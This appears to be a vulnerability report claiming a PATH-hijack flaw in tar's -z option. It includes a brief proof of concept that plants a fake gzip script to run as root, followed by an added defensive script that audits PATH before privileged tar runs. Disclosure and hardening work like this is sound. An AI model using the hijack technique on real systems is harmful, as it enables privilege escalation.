Hi! As per subject, I discovered a Path Hijack vulnerability in the tar binary. When using the -z switch for gzip compression/decompression, the binary calls “gzip” without an absolute path, hence allowing the path hijack. While this can be totally harmless in a normal scenario, it can be used as a privilege escalation technique when the tar binary is called as root user.
Following lines will provide a basic PoC:

----
export PATH=$(pwd):$PATH
echo -e '#!/bin/bash\ntouch /tmp/tarred' > gzip
chmod +x gzip
touch file.txt
tar -zcf backup.tar.gz file.txt
ls -la /tmp/tarred
-rw-r--r-- 1 root root 0 Nov 3 14:05 /tmp/tarred
----

I have not tested switches for other compression/decompression formats, so there is a chance that they can be used as well as gzip. The remediation would be to make sure that tar calls gzip by its absolute path.

Best Regards,
Gregorio Giacobbe
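Added example, not part of the original message or of tar itself: a pre-flight check that a root-run backup script could perform before calling tar -z, reporting PATH entries where another user could place a helper named gzip and showing which file a bare "gzip" resolves to. The function names audit_path and first_hit are invented for this sketch, and only the PATH directories themselves are inspected, not their parents.

```shell
#!/bin/sh
# Added example: audit the PATH a privileged job will hand to tar -z.
# audit_path and first_hit are hypothetical helper names.

# Print "reason<TAB>entry" for every PATH entry that lets someone other
# than root or the invoking user drop a binary there. Silent if clean.
audit_path() (
    me=$(id -u)
    p="$1:"                      # trailing ':' preserves a final empty entry
    IFS=:; set -f                # split on ':' only, no globbing
    for d in $p; do
        case $d in
            '') printf 'empty(cwd)\t%s\n' "$d"; continue ;;
            /*) ;;
            *)  printf 'relative\t%s\n' "$d"; continue ;;
        esac
        [ -d "$d" ] || continue  # non-existent entries are skipped here
        # -L: judge the directory a symlink points to, not the link itself
        if [ -n "$(find -L "$d" -maxdepth 0 \( -perm -002 -o -perm -020 \))" ]; then
            printf 'group/world-writable\t%s\n' "$d"
        elif [ -n "$(find -L "$d" -maxdepth 0 ! -uid 0 ! -uid "$me")" ]; then
            printf 'foreign-owner\t%s\n' "$d"
        fi
    done
)

# Print the file a bare command name ($1) resolves to under PATH string $2,
# using the same left-to-right search the PoC above relies on.
first_hit() (
    p="$2:"; IFS=:; set -f
    for d in $p; do
        [ -z "$d" ] && d=.       # an empty entry means the current directory
        [ -f "$d/$1" ] && [ -x "$d/$1" ] && { printf '%s\n' "$d/$1"; exit 0; }
    done
    exit 1
)

# Stand-alone run: report on the current environment.
audit_path "$PATH"
first_hit gzip "$PATH" || echo "gzip not found on PATH"
```

Any line printed by audit_path is a reason to reset PATH to root-owned system directories in the privileged job before it invokes tar.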